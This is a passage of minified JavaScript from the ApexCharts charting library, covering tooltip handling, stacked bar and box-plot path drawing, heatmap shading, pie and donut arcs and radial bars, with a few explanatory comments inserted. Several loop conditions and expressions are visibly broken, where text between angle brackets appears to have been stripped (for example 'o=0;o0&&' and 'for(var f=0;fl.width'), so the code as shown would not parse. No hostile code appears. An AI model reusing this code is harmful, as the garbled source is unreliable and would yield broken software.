n=document.createElement("div");if(n.classList.add("apexcharts-tooltip"),a.config.tooltip.cssClass&&n.classList.add(a.config.tooltip.cssClass),n.classList.add("apexcharts-theme-".concat(this.tConfig.theme)),a.globals.dom.elWrap.appendChild(n),a.globals.axisCharts){this.axesTooltip.drawXaxisTooltip(),this.axesTooltip.drawYaxisTooltip(),this.axesTooltip.setXCrosshairWidth(),this.axesTooltip.handleYCrosshair();var i=new 
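/* Main Tooltip controller: drawTooltip() builds the .apexcharts-tooltip DOM with one
.apexcharts-tooltip-series-group per series (createTTElements) and wires the mousemove/touch
listeners that drive the position, marker and intersect helpers above. */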
q(this.ctx);this.xAxisTicksPositions=i.getXAxisTicksPositions()}if(!a.globals.comboCharts&&!this.tConfig.intersect&&"rangeBar"!==a.config.chart.type||this.tConfig.shared||(this.showOnIntersect=!0),0!==a.config.markers.size&&0!==a.globals.markers.largestSize||this.marker.drawDynamicPoints(this),a.globals.collapsedSeries.length!==a.globals.series.length){this.dataPointsDividedHeight=a.globals.gridHeight/a.globals.dataPoints,this.dataPointsDividedWidth=a.globals.gridWidth/a.globals.dataPoints,this.showTooltipTitle&&(this.tooltipTitle=document.createElement("div"),this.tooltipTitle.classList.add("apexcharts-tooltip-title"),this.tooltipTitle.style.fontFamily=this.tConfig.style.fontFamily||a.config.chart.fontFamily,this.tooltipTitle.style.fontSize=this.tConfig.style.fontSize,n.appendChild(this.tooltipTitle));var t=a.globals.series.length;(a.globals.xyCharts||a.globals.comboCharts)&&this.tConfig.shared&&(t=this.showOnIntersect?1:a.globals.series.length),this.legendLabels=a.globals.dom.baseEl.querySelectorAll(".apexcharts-legend-text"),this.ttItems=this.createTTElements(t),this.addSVGEvents()}}},{key:"createTTElements",value:function(e){for(var a=this,n=this.w,i=[],t=this.getElTooltip(),r=function(r){var o=document.createElement("div");o.classList.add("apexcharts-tooltip-series-group"),o.style.order=n.config.tooltip.inverseOrder?e-r:r+1,a.tConfig.shared&&a.tConfig.enabledOnSeries&&Array.isArray(a.tConfig.enabledOnSeries)&&a.tConfig.enabledOnSeries.indexOf(r)<0&&o.classList.add("apexcharts-tooltip-series-group-hidden");var s=document.createElement("span");s.classList.add("apexcharts-tooltip-marker"),s.style.backgroundColor=n.globals.colors[r],o.appendChild(s);var l=document.createElement("div");l.classList.add("apexcharts-tooltip-text"),l.style.fontFamily=a.tConfig.style.fontFamily||n.config.chart.fontFamily,l.style.fontSize=a.tConfig.style.fontSize,["y","goals","z"].forEach((function(e){var a=document.createElement("div");a.classList.add("apexcharts-tooltip-".concat(e,"-group"));var n=document.createElement("span");n.classList.add("apexcharts-tooltip-text-".concat(e,"-label")),a.appendChild(n);var i=document.createElement("span");i.classList.add("apexcharts-tooltip-text-".concat(e,"-value")),a.appendChild(i),l.appendChild(a)})),o.appendChild(l),t.appendChild(o),i.push(o)},o=0;o0&&this.addPathsEventListeners(p,c),this.tooltipUtil.hasBars()&&!this.tConfig.shared&&this.addDatapointEventsListeners(c)}}},{key:"drawFixedTooltipRect",value:function(){var e=this.w,a=this.getElTooltip(),n=a.getBoundingClientRect(),i=n.width+10,t=n.height+10,r=this.tConfig.fixed.offsetX,o=this.tConfig.fixed.offsetY,s=this.tConfig.fixed.position.toLowerCase();return s.indexOf("right")>-1&&(r=r+e.globals.svgWidth-i+10),s.indexOf("bottom")>-1&&(o=o+e.globals.svgHeight-t-10),a.style.left=r+"px",a.style.top=o+"px",{x:r,y:o,ttWidth:i,ttHeight:t}}},{key:"addDatapointEventsListeners",value:function(e){var a=this.w.globals.dom.baseEl.querySelectorAll(".apexcharts-series-markers .apexcharts-marker, .apexcharts-bar-area, .apexcharts-candlestick-area, .apexcharts-boxPlot-area, .apexcharts-rangebar-area");this.addPathsEventListeners(a,e)}},{key:"addPathsEventListeners",value:function(e,a){for(var n=this,i=function(i){var t={paths:e[i],tooltipEl:a.tooltipEl,tooltipY:a.tooltipY,tooltipX:a.tooltipX,elGrid:a.elGrid,hoverArea:a.hoverArea,ttItems:a.ttItems};["mousemove","mouseup","touchmove","mouseout","touchend"].map((function(a){return 
e[i].addEventListener(a,n.onSeriesHover.bind(n,t),{capture:!1,passive:!0})}))},t=0;t<e.length;t++)i(t)}},{key:"onSeriesHover",value:function(e,a){var n=this,i=Date.now()-this.lastHoverTime;i>=100?this.seriesHover(e,a):(clearTimeout(this.seriesHoverTimeout),this.seriesHoverTimeout=setTimeout((function(){n.seriesHover(e,a)}),100-i))}},{key:"seriesHover",value:function(e,a){var n=this;this.lastHoverTime=Date.now();var i=[],t=this.w;t.config.chart.group&&(i=this.ctx.getGroupedCharts()),t.globals.axisCharts&&(t.globals.minX===-1/0&&t.globals.maxX===1/0||0===t.globals.dataPoints)||(i.length?i.forEach((function(i){var t=n.getElTooltip(i),r={paths:e.paths,tooltipEl:t,tooltipY:e.tooltipY,tooltipX:e.tooltipX,elGrid:e.elGrid,hoverArea:e.hoverArea,ttItems:i.w.globals.tooltip.ttItems};i.w.globals.minX===n.w.globals.minX&&i.w.globals.maxX===n.w.globals.maxX&&i.w.globals.tooltip.seriesHoverByContext({chartCtx:i,ttCtx:i.w.globals.tooltip,opt:r,e:a})})):this.seriesHoverByContext({chartCtx:this.ctx,ttCtx:this.w.globals.tooltip,opt:e,e:a}))}},{key:"seriesHoverByContext",value:function(e){var a=e.chartCtx,n=e.ttCtx,i=e.opt,t=e.e,r=a.w,o=this.getElTooltip();o&&(n.tooltipRect={x:0,y:0,ttWidth:o.getBoundingClientRect().width,ttHeight:o.getBoundingClientRect().height},n.e=t,!n.tooltipUtil.hasBars()||r.globals.comboCharts||n.isBarShared||this.tConfig.onDatasetHover.highlightDataSeries&&new K(a).toggleSeriesOnHover(t,t.target.parentNode),n.fixedTooltip&&n.drawFixedTooltipRect(),r.globals.axisCharts?n.axisChartsTooltips({e:t,opt:i,tooltipRect:n.tooltipRect}):n.nonAxisChartsTooltips({e:t,opt:i,tooltipRect:n.tooltipRect}))}},{key:"axisChartsTooltips",value:function(e){var a,n,i=e.e,t=e.opt,r=this.w,o=t.elGrid.getBoundingClientRect(),s="touchmove"===i.type?i.touches[0].clientX:i.clientX,l="touchmove"===i.type?i.touches[0].clientY:i.clientY;if(this.clientY=l,this.clientX=s,r.globals.capturedSeriesIndex=-1,r.globals.capturedDataPointIndex=-1,l<o.top||l>o.top+o.height)this.handleMouseOut(t);else{if(Array.isArray(this.tConfig.enabledOnSeries)&&!r.config.tooltip.shared){var u=parseInt(t.paths.getAttribute("index"),10);if(this.tConfig.enabledOnSeries.indexOf(u)<0)return void this.handleMouseOut(t)}var c=this.getElTooltip(),d=this.getElXCrosshairs(),h=r.globals.xyCharts||"bar"===r.config.chart.type&&!r.globals.isBarHorizontal&&this.tooltipUtil.hasBars()&&this.tConfig.shared||r.globals.comboCharts&&this.tooltipUtil.hasBars();if("mousemove"===i.type||"touchmove"===i.type||"mouseup"===i.type){if(r.globals.collapsedSeries.length+r.globals.ancillaryCollapsedSeries.length===r.globals.series.length)return;null!==d&&d.classList.add("apexcharts-active");var p=this.yaxisTooltips.filter((function(e){return!0===e}));if(null!==this.ycrosshairs&&p.length&&this.ycrosshairs.classList.add("apexcharts-active"),h&&!this.showOnIntersect)this.handleStickyTooltip(i,s,l,t);else if("heatmap"===r.config.chart.type||"treemap"===r.config.chart.type){var m=this.intersect.handleHeatTreeTooltip({e:i,opt:t,x:a,y:n,type:r.config.chart.type});a=m.x,n=m.y,c.style.left=a+"px",c.style.top=n+"px"}else this.tooltipUtil.hasBars()&&this.intersect.handleBarTooltip({e:i,opt:t}),this.tooltipUtil.hasMarkers()&&this.intersect.handleMarkerTooltip({e:i,opt:t,x:a,y:n});if(this.yaxisTooltips.length)for(var f=0;fl.width?this.handleMouseOut(i):null!==s?this.handleStickyCapturedSeries(e,s,i,o):(this.tooltipUtil.isXoverlap(o)||t.globals.isBarHorizontal)&&this.create(e,this,0,o,i.ttItems)}},{key:"handleStickyCapturedSeries",value:function(e,a,n,i){var t=this.w;this.tConfig.shared||null!==t.globals.series[a][i]?void
0!==t.globals.series[a][i]?this.tConfig.shared&&this.tooltipUtil.isXoverlap(i)&&this.tooltipUtil.isInitialSeriesSameLen()?this.create(e,this,a,i,n.ttItems):this.create(e,this,a,i,n.ttItems,!1):this.tooltipUtil.isXoverlap(i)&&this.create(e,this,0,i,n.ttItems):this.handleMouseOut(n)}},{key:"deactivateHoverFilter",value:function(){for(var e=this.w,a=new S(this.ctx),n=e.globals.dom.Paper.select(".apexcharts-bar-area"),i=0;i5&&void 0!==arguments[5]?arguments[5]:null,o=this.w,s=a;"mouseup"===e.type&&this.markerClick(e,n,i),null===r&&(r=this.tConfig.shared);var l=this.tooltipUtil.hasMarkers(),u=this.tooltipUtil.getElBars();if(o.config.legend.tooltipHoverFormatter){var c=o.config.legend.tooltipHoverFormatter,d=Array.from(this.legendLabels);d.forEach((function(e){var a=e.getAttribute("data:default-text");e.innerHTML=decodeURIComponent(a)}));for(var h=0;h0?s.marker.enlargePoints(i):s.tooltipPosition.moveDynamicPointsOnHover(i)),this.tooltipUtil.hasBars()&&(this.barSeriesHeight=this.tooltipUtil.getBarsHeight(u),this.barSeriesHeight>0)){var g=new S(this.ctx),b=o.globals.dom.Paper.select(".apexcharts-bar-area[j='".concat(i,"']"));this.deactivateHoverFilter(),this.tooltipPosition.moveStickyTooltipOverBars(i);for(var k=0;k0&&(this.totalItems+=e[o].length);for(var s=this.graphics.group({class:"apexcharts-bar-series apexcharts-plot-series"}),l=0,u=0,c=function(t,o){var c=void 0,d=void 0,h=void 0,p=void 0,m=[],f=[],v=i.globals.comboCharts?a[t]:t;n.yRatio.length>1&&(n.yaxisIndex=v),n.isReversed=i.config.yaxis[n.yaxisIndex]&&i.config.yaxis[n.yaxisIndex].reversed;var g=n.graphics.group({class:"apexcharts-series",seriesName:k.escapeString(i.globals.seriesNames[v]),rel:t+1,"data:realIndex":v});n.ctx.series.addCollapsedClassToSeries(g,v);var b=n.graphics.group({class:"apexcharts-datalabels","data:realIndex":v}),y=0,x=0,S=n.initialPositions(l,u,c,d,h,p);u=S.y,y=S.barHeight,d=S.yDivision,p=S.zeroW,l=S.x,x=S.barWidth,c=S.xDivision,h=S.zeroH,n.yArrj=[],n.yArrjF=[],n.yArrjVal=[],n.xArrj=[],n.xArrjF=[],n.xArrjVal=[],1===n.prevY.length&&n.prevY[0].every((function(e){return isNaN(e)}))&&(n.prevY[0]=n.prevY[0].map((function(e){return h})),n.prevYF[0]=n.prevYF[0].map((function(e){return 0})));for(var A=0;A1?(n=l.globals.minXDiff/this.xRatio)*parseInt(this.barOptions.columnWidth,10)/100:s*parseInt(l.config.plotOptions.bar.columnWidth,10)/100,t=this.baseLineY[this.yaxisIndex]+(this.isReversed?l.globals.gridHeight:0)-(this.isReversed?2*this.baseLineY[this.yaxisIndex]:0),e=l.globals.padHorizontal+(n-s)/2),{x:e,y:a,yDivision:i,xDivision:n,barHeight:o,barWidth:s,zeroH:t,zeroW:r}}},{key:"drawStackedBarPaths",value:function(e){for(var a,n=e.indexes,i=e.barHeight,t=e.strokeWidth,r=e.zeroW,o=e.x,s=e.y,l=e.yDivision,u=e.elSeries,c=this.w,d=s,h=n.i,p=n.j,m=0,f=0;f0){var v=r;this.prevXVal[h-1][p]<0?v=this.series[h][p]>=0?this.prevX[h-1][p]+m-2*(this.isReversed?m:0):this.prevX[h-1][p]:this.prevXVal[h-1][p]>=0&&(v=this.series[h][p]>=0?this.prevX[h-1][p]:this.prevX[h-1][p]-m+2*(this.isReversed?m:0)),a=v}else a=r;o=null===this.series[h][p]?a:a+this.series[h][p]/this.invertedYRatio-2*(this.isReversed?this.series[h][p]/this.invertedYRatio:0);var g=this.barHelpers.getBarpaths({barYPosition:d,barHeight:i,x1:a,x2:o,strokeWidth:t,series:this.series,realIndex:n.realIndex,i:h,j:p,w:c});return this.barHelpers.barBackground({j:p,i:h,y1:d,y2:i,elSeries:u}),s+=l,{pathTo:g.pathTo,pathFrom:g.pathFrom,x:o,y:s}}},{key:"drawStackedColumnPaths",value:function(e){var a=e.indexes,n=e.x,i=e.y,t=e.xDivision,r=e.barWidth,o=e.zeroH;e.strokeWidth;var 
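/* Stacked bars/columns: drawStackedBarPaths()/drawStackedColumnPaths() accumulate each segment on
the running totals kept in prevX/prevY (and prevYF), so a segment's baseline is the height of the
stack below it rather than the axis zero line. */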
s=e.elSeries,l=this.w,u=a.i,c=a.j,d=a.bc;if(l.globals.isXNumeric){var h=l.globals.seriesX[u][c];h||(h=0),n=(h-l.globals.minX)/this.xRatio-r/2}for(var p,m=n,f=0,v=0;v0&&!l.globals.isXNumeric||u>0&&l.globals.isXNumeric&&l.globals.seriesX[u-1][c]===l.globals.seriesX[u][c]){var g,b,k=Math.min(this.yRatio.length+1,u+1);if(void 0!==this.prevY[u-1])for(var y=1;y=0?b-f+2*(this.isReversed?f:0):b;break}if(this.prevYVal[u-x][c]>=0){g=this.series[u][c]>=0?b:b+f-2*(this.isReversed?f:0);break}}void 0===g&&(g=l.globals.gridHeight),p=this.prevYF[0].every((function(e){return 0===e}))&&this.prevYF.slice(1,u).every((function(e){return e.every((function(e){return isNaN(e)}))}))?l.globals.gridHeight-o:g}else p=l.globals.gridHeight-o;i=p-this.series[u][c]/this.yRatio[this.yaxisIndex]+2*(this.isReversed?this.series[u][c]/this.yRatio[this.yaxisIndex]:0);var S=this.barHelpers.getColumnPaths({barXPosition:m,barWidth:r,y1:p,y2:i,yRatio:this.yRatio[this.yaxisIndex],strokeWidth:this.strokeWidth,series:this.series,realIndex:a.realIndex,i:u,j:c,w:l});return this.barHelpers.barBackground({bc:d,j:c,i:u,x1:m,x2:r,elSeries:s}),n+=t,{pathTo:S.pathTo,pathFrom:S.pathFrom,x:l.globals.isXNumeric?n-t:n,y:i}}}]),n}(),we=function(e){d(n,_);var a=f(n);function n(){return s(this,n),a.apply(this,arguments)}return u(n,[{key:"draw",value:function(e,a){var n=this,i=this.w,t=new S(this.ctx),o=new L(this.ctx);this.candlestickOptions=this.w.config.plotOptions.candlestick,this.boxOptions=this.w.config.plotOptions.boxPlot,this.isHorizontal=i.config.plotOptions.bar.horizontal;var s=new A(this.ctx,i);e=s.getLogSeries(e),this.series=e,this.yRatio=s.getLogYRatios(this.yRatio),this.barHelpers.initVariables(e);for(var l=t.group({class:"apexcharts-".concat(i.config.chart.type,"-series apexcharts-plot-series")}),u=function(s){n.isBoxPlot="boxPlot"===i.config.chart.type||"boxPlot"===i.config.series[s].type;var u,c,d,h,p,m,f=void 0,v=void 0,g=[],b=[],y=i.globals.comboCharts?a[s]:s,x=t.group({class:"apexcharts-series",seriesName:k.escapeString(i.globals.seriesNames[y]),rel:s+1,"data:realIndex":y});n.ctx.series.addCollapsedClassToSeries(x,y),e[s].length>0&&(n.visibleI=n.visibleI+1),n.yRatio.length>1&&(n.yaxisIndex=y);var S=n.barHelpers.initialPositions();v=S.y,p=S.barHeight,c=S.yDivision,h=S.zeroW,f=S.x,m=S.barWidth,u=S.xDivision,d=S.zeroH,b.push(f+m/2);for(var A=t.group({class:"apexcharts-datalabels","data:realIndex":y}),w=function(a){var t=n.barHelpers.getStrokeWidth(s,a,y),l=null,k={indexes:{i:s,j:a,realIndex:y},x:f,y:v,strokeWidth:t,elSeries:x};l=n.isHorizontal?n.drawHorizontalBoxPaths(r(r({},k),{},{yDivision:c,barHeight:p,zeroW:h})):n.drawVerticalBoxPaths(r(r({},k),{},{xDivision:u,barWidth:m,zeroH:d})),v=l.y,f=l.x,a>0&&b.push(f+m/2),g.push(v),l.pathTo.forEach((function(r,u){var c=!n.isBoxPlot&&n.candlestickOptions.wick.useFillColor?l.color[u]:i.globals.stroke.colors[s],d=o.fillPath({seriesNumber:y,dataPointIndex:a,color:l.color[u],value:e[s][a]});n.renderSeries({realIndex:y,pathFill:d,lineFill:c,j:a,i:s,pathFrom:l.pathFrom,pathTo:r,strokeWidth:t,elSeries:x,x:f,y:v,series:e,barHeight:p,barWidth:m,elDataLabelsWrap:A,visibleSeries:n.visibleI,type:i.config.chart.type})}))},M=0;Mg.c&&(d=!1);var y=Math.min(g.o,g.c),x=Math.max(g.o,g.c),A=g.m;s.globals.isXNumeric&&(n=(s.globals.seriesX[v][c]-s.globals.minX)/this.xRatio-t/2);var w=n+t*this.visibleI;void 0===this.series[u][c]||null===this.series[u][c]?(y=r,x=r):(y=r-y/f,x=r-x/f,b=r-g.h/f,k=r-g.l/f,A=r-g.m/f);var M=l.move(w,r),j=l.move(w+t/2,y);return 
s.globals.previousPaths.length>0&&(j=this.getPreviousPath(v,c,!0)),M=this.isBoxPlot?[l.move(w,y)+l.line(w+t/2,y)+l.line(w+t/2,b)+l.line(w+t/4,b)+l.line(w+t-t/4,b)+l.line(w+t/2,b)+l.line(w+t/2,y)+l.line(w+t,y)+l.line(w+t,A)+l.line(w,A)+l.line(w,y+o/2),l.move(w,A)+l.line(w+t,A)+l.line(w+t,x)+l.line(w+t/2,x)+l.line(w+t/2,k)+l.line(w+t-t/4,k)+l.line(w+t/4,k)+l.line(w+t/2,k)+l.line(w+t/2,x)+l.line(w,x)+l.line(w,A)+"z"]:[l.move(w,x)+l.line(w+t/2,x)+l.line(w+t/2,b)+l.line(w+t/2,x)+l.line(w+t,x)+l.line(w+t,y)+l.line(w+t/2,y)+l.line(w+t/2,k)+l.line(w+t/2,y)+l.line(w,y)+l.line(w,x-o/2)],j+=l.move(w,y),s.globals.isXNumeric||(n+=i),{pathTo:M,pathFrom:j,x:n,y:x,barXPosition:w,color:this.isBoxPlot?m:d?[h]:[p]}}},{key:"drawHorizontalBoxPaths",value:function(e){var a=e.indexes;e.x;var n=e.y,i=e.yDivision,t=e.barHeight,r=e.zeroW,o=e.strokeWidth,s=this.w,l=new S(this.ctx),u=a.i,c=a.j,d=this.boxOptions.colors.lower;this.isBoxPlot&&(d=[this.boxOptions.colors.lower,this.boxOptions.colors.upper]);var h=this.invertedYRatio,p=a.realIndex,m=this.getOHLCValue(p,c),f=r,v=r,g=Math.min(m.o,m.c),b=Math.max(m.o,m.c),k=m.m;s.globals.isXNumeric&&(n=(s.globals.seriesX[p][c]-s.globals.minX)/this.invertedXRatio-t/2);var y=n+t*this.visibleI;void 0===this.series[u][c]||null===this.series[u][c]?(g=r,b=r):(g=r+g/h,b=r+b/h,f=r+m.h/h,v=r+m.l/h,k=r+m.m/h);var x=l.move(r,y),A=l.move(g,y+t/2);return s.globals.previousPaths.length>0&&(A=this.getPreviousPath(p,c,!0)),x=[l.move(g,y)+l.line(g,y+t/2)+l.line(f,y+t/2)+l.line(f,y+t/2-t/4)+l.line(f,y+t/2+t/4)+l.line(f,y+t/2)+l.line(g,y+t/2)+l.line(g,y+t)+l.line(k,y+t)+l.line(k,y)+l.line(g+o/2,y),l.move(k,y)+l.line(k,y+t)+l.line(b,y+t)+l.line(b,y+t/2)+l.line(v,y+t/2)+l.line(v,y+t-t/4)+l.line(v,y+t/4)+l.line(v,y+t/2)+l.line(b,y+t/2)+l.line(b,y)+l.line(k,y)+"z"],A+=l.move(g,y),s.globals.isXNumeric||(n+=i),{pathTo:x,pathFrom:A,x:b,y:n,barYPosition:y,color:d}}},{key:"getOHLCValue",value:function(e,a){var n=this.w;return{o:this.isBoxPlot?n.globals.seriesCandleH[e][a]:n.globals.seriesCandleO[e][a],h:this.isBoxPlot?n.globals.seriesCandleO[e][a]:n.globals.seriesCandleH[e][a],m:n.globals.seriesCandleM[e][a],l:this.isBoxPlot?n.globals.seriesCandleC[e][a]:n.globals.seriesCandleL[e][a],c:this.isBoxPlot?n.globals.seriesCandleL[e][a]:n.globals.seriesCandleC[e][a]}}}]),n}(),Me=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"checkColorRange",value:function(){var e=this.w,a=!1,n=e.config.plotOptions[e.config.chart.type];return n.colorScale.ranges.length>0&&n.colorScale.ranges.map((function(e,n){e.from<=0&&(a=!0)})),a}},{key:"getShadeColor",value:function(e,a,n,i){var t=this.w,r=1,o=t.config.plotOptions[e].shadeIntensity,s=this.determineColor(e,a,n);t.globals.hasNegs||i?r=t.config.plotOptions[e].reverseNegativeShade?s.percent<0?s.percent/100*(1.25*o):(1-s.percent/100)*(1.25*o):s.percent<=0?1-(1+s.percent/100)*o:(1-s.percent/100)*o:(r=1-s.percent/100,"treemap"===e&&(r=(1-s.percent/100)*(1.25*o)));var l=s.color,u=new k;return t.config.plotOptions[e].enableShades&&(l="dark"===this.w.config.theme.mode?k.hexToRgba(u.shadeColor(-1*r,s.color),t.config.fill.opacity):k.hexToRgba(u.shadeColor(r,s.color),t.config.fill.opacity)),{color:l,colorProps:s}}},{key:"determineColor",value:function(e,a,n){var i=this.w,t=i.globals.series[a][n],r=i.config.plotOptions[e],o=r.colorScale.inverse?n:a;r.distributed&&"treemap"===i.config.chart.type&&(o=n);var 
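/* Heatmap/treemap shading: determineColor() picks the base color for a cell and computes
percent = 100 * value / (|min| + |max|) over the series or colorScale range; getShadeColor() then
lightens or darkens it by shadeIntensity (inverted in dark mode). For example, with min = -20 and
max = 80, a value of 30 shades at 100 * 30 / (20 + 80) = 30%. */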
s=i.globals.colors[o],l=null,u=Math.min.apply(Math,v(i.globals.series[a])),c=Math.max.apply(Math,v(i.globals.series[a]));r.distributed||"heatmap"!==e||(u=i.globals.minY,c=i.globals.maxY),void 0!==r.colorScale.min&&(u=r.colorScale.min<i.globals.minY?r.colorScale.min:i.globals.minY,c=r.colorScale.max>i.globals.maxY?r.colorScale.max:i.globals.maxY);var d=Math.abs(c)+Math.abs(u),h=100*t/(0===d?d-1e-6:d);return r.colorScale.ranges.length>0&&r.colorScale.ranges.map((function(e,a){if(t>=e.from&&t<=e.to){s=e.color,l=e.foreColor?e.foreColor:null,u=e.from,c=e.to;var n=Math.abs(c)+Math.abs(u);h=100*t/(0===n?n-1e-6:n)}})),{color:s,foreColor:l,percent:h}}},{key:"calculateDataLabels",value:function(e){var a=e.text,n=e.x,i=e.y,t=e.i,r=e.j,o=e.colorProps,s=e.fontSize,l=this.w.config.dataLabels,u=new S(this.ctx),c=new E(this.ctx),d=null;if(l.enabled){d=u.group({class:"apexcharts-data-labels"});var h=l.offsetX,p=l.offsetY,m=n+h,f=i+parseFloat(l.style.fontSize)/3+p;c.plotDataLabelsText({x:m,y:f,text:a,i:t,j:r,color:o.foreColor,parent:d,fontSize:s,dataLabelsConfig:l})}return d}},{key:"addListeners",value:function(e){var a=new S(this.ctx);e.node.addEventListener("mouseenter",a.pathMouseEnter.bind(this,e)),e.node.addEventListener("mouseleave",a.pathMouseLeave.bind(this,e)),e.node.addEventListener("mousedown",a.pathMouseDown.bind(this,e))}}]),e}(),je=function(){function e(a,n){s(this,e),this.ctx=a,this.w=a.w,this.xRatio=n.xRatio,this.yRatio=n.yRatio,this.dynamicAnim=this.w.config.chart.animations.dynamicAnimation,this.helpers=new Me(a),this.rectRadius=this.w.config.plotOptions.heatmap.radius,this.strokeWidth=this.w.config.stroke.show?this.w.config.stroke.width:0}return u(e,[{key:"draw",value:function(e){var a=this.w,n=new S(this.ctx),i=n.group({class:"apexcharts-heatmap"});i.attr("clip-path","url(#gridRectMask".concat(a.globals.cuid,")"));var t=a.globals.gridWidth/a.globals.dataPoints,r=a.globals.gridHeight/a.globals.series.length,o=0,s=!1;this.negRange=this.helpers.checkColorRange();var l=e.slice();a.config.yaxis[0].reversed&&(s=!0,l.reverse());for(var u=s?0:l.length-1;s?u<l.length:u>=0;s?u++:u--){var c=n.group({class:"apexcharts-series apexcharts-heatmap-series",seriesName:k.escapeString(a.globals.seriesNames[u]),rel:u+1,"data:realIndex":u});if(this.ctx.series.addCollapsedClassToSeries(c,u),a.config.chart.dropShadow.enabled){var d=a.config.chart.dropShadow;new x(this.ctx).dropShadow(c,d,u)}for(var h=0,p=a.config.plotOptions.heatmap.shadeIntensity,m=0;m-1&&this.pieClicked(d),n.config.dataLabels.enabled){var A=b.x,w=b.y,M=100*p/this.fullAngle+"%";if(0!==p&&n.config.plotOptions.pie.dataLabels.minAngleToShowLabelthis.fullAngle?a.endAngle=a.endAngle-(i+o):i+o=this.fullAngle+this.w.config.plotOptions.pie.startAngle%this.fullAngle&&(s=this.fullAngle+this.w.config.plotOptions.pie.startAngle%this.fullAngle-.01),Math.ceil(s)>this.fullAngle&&(s-=this.fullAngle);var l=Math.PI*(s-90)/180,u=a.centerX+t*Math.cos(o),c=a.centerY+t*Math.sin(o),d=a.centerX+t*Math.cos(l),h=a.centerY+t*Math.sin(l),p=k.polarToCartesian(a.centerX,a.centerY,a.donutSize,s),m=k.polarToCartesian(a.centerX,a.centerY,a.donutSize,r),f=i>180?1:0,v=["M",u,c,"A",t,t,0,f,1,d,h];return"donut"===a.chartType?[].concat(v,["L",p.x,p.y,"A",a.donutSize,a.donutSize,0,f,0,m.x,m.y,"L",u,c,"z"]).join(" "):"pie"===a.chartType||"polarArea"===a.chartType?[].concat(v,["L",a.centerX,a.centerY,"L",u,c]).join(" "):[].concat(v).join(" ")}},{key:"drawPolarElements",value:function(e){var a=this.w,n=new X(this.ctx),i=new S(this.ctx),t=new
Ce(this.ctx),r=i.group(),o=i.group(),s=n.niceScale(0,Math.ceil(this.maxY),a.config.yaxis[0].tickAmount,0,!0),l=s.result.reverse(),u=s.result.length;this.maxY=s.niceMax;for(var c=a.globals.radialSize,d=c/(u-1),h=0;h1&&e.total.show&&(t=e.total.color);var o=r.globals.dom.baseEl.querySelector(".apexcharts-datalabel-label"),s=r.globals.dom.baseEl.querySelector(".apexcharts-datalabel-value");n=(0,e.value.formatter)(n,r),i||"function"!=typeof e.total.formatter||(n=e.total.formatter(r));var l=a===e.total.label;a=e.name.formatter(a,l,r),null!==o&&(o.textContent=a),null!==s&&(s.textContent=n),null!==o&&(o.style.fill=t)}},{key:"printDataLabelsInner",value:function(e,a){var n=this.w,i=e.getAttribute("data:value"),t=n.globals.seriesNames[parseInt(e.parentNode.getAttribute("rel"),10)-1];n.globals.series.length>1&&this.printInnerLabels(a,t,i,e);var r=n.globals.dom.baseEl.querySelector(".apexcharts-datalabels-group");null!==r&&(r.style.opacity=1)}},{key:"drawSpokes",value:function(e){var a=this,n=this.w,i=new S(this.ctx),t=n.config.plotOptions.polarArea.spokes;if(0!==t.strokeWidth){for(var r=[],o=360/n.globals.series.length,s=0;s1)o&&!a.total.showAlways?l({makeSliceOut:!1,printLabel:!0}):this.printInnerLabels(a,a.total.label,a.total.formatter(t));else if(l({makeSliceOut:!1,printLabel:!0}),!o)if(t.globals.selectedDataPoints.length&&t.globals.series.length>1)if(t.globals.selectedDataPoints[0].length>0){var u=t.globals.selectedDataPoints[0],c=t.globals.dom.baseEl.querySelector(".apexcharts-".concat(this.chartType.toLowerCase(),"-slice-").concat(u));this.printDataLabelsInner(c,a)}else r&&t.globals.selectedDataPoints.length&&0===t.globals.selectedDataPoints[0].length&&(r.style.opacity=0);else r&&t.globals.series.length>1&&(r.style.opacity=0)}}]),e}(),Be=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.chartType=this.w.config.chart.type,this.initialAnim=this.w.config.chart.animations.enabled,this.dynamicAnim=this.initialAnim&&this.w.config.chart.animations.dynamicAnimation.enabled,this.animDur=0;var n=this.w;this.graphics=new S(this.ctx),this.lineColorArr=void 0!==n.globals.stroke.colors?n.globals.stroke.colors:n.globals.colors,this.defaultSize=n.globals.svgHeight0&&(f=a.getPreviousPath(s));for(var v=0;v=10?e.x>0?(n="start",i+=10):e.x<0&&(n="end",i-=10):n="middle",Math.abs(e.y)>=a-10&&(e.y<0?t-=10:e.y>0&&(t+=10)),{textAnchor:n,newX:i,newY:t}}},{key:"getPreviousPath",value:function(e){for(var a=this.w,n=null,i=0;i0&&parseInt(t.realIndex,10)===parseInt(e,10)&&void 0!==a.globals.previousPaths[i].paths[0]&&(n=a.globals.previousPaths[i].paths[0].d)}return n}},{key:"getDataPointsPos",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:this.dataPointsLen;e=e||[],a=a||[];for(var i=[],t=0;t=360&&(h=360-Math.abs(this.startAngle)-.1);var p=n.drawPath({d:"",stroke:c,strokeWidth:o*parseInt(u.strokeWidth,10)/100,fill:"none",strokeOpacity:u.opacity,classes:"apexcharts-radialbar-area"});if(u.dropShadow.enabled){var m=u.dropShadow;t.dropShadow(p,m)}l.add(p),p.attr("id","apexcharts-radialbarTrack-"+s),this.animatePaths(p,{centerX:e.centerX,centerY:e.centerY,endAngle:h,startAngle:d,size:e.size,i:s,totalItems:2,animBeginArr:0,dur:0,isTrack:!0,easing:a.globals.easing})}return i}},{key:"drawArcs",value:function(e){var a=this.w,n=new S(this.ctx),i=new L(this.ctx),t=new x(this.ctx),r=n.group(),o=this.getStrokeWidth(e);e.size=e.size-o/2;var 
s=a.config.plotOptions.radialBar.hollow.background,l=e.size-o*e.series.length-this.margin*e.series.length-o*parseInt(a.config.plotOptions.radialBar.track.strokeWidth,10)/100/2,u=l-a.config.plotOptions.radialBar.hollow.margin;void 0!==a.config.plotOptions.radialBar.hollow.image&&(s=this.drawHollowImage(e,r,l,s));var c=this.drawHollow({size:u,centerX:e.centerX,centerY:e.centerY,fill:s||"transparent"});if(a.config.plotOptions.radialBar.hollow.dropShadow.enabled){var d=a.config.plotOptions.radialBar.hollow.dropShadow;t.dropShadow(c,d)}var h=1;!this.radialDataLabels.total.show&&a.globals.series.length>1&&(h=0);var p=null;this.radialDataLabels.show&&(p=this.renderInnerDataLabels(this.radialDataLabels,{hollowSize:l,centerX:e.centerX,centerY:e.centerY,opacity:h})),"back"===a.config.plotOptions.radialBar.hollow.position&&(r.add(c),p&&r.add(p));var 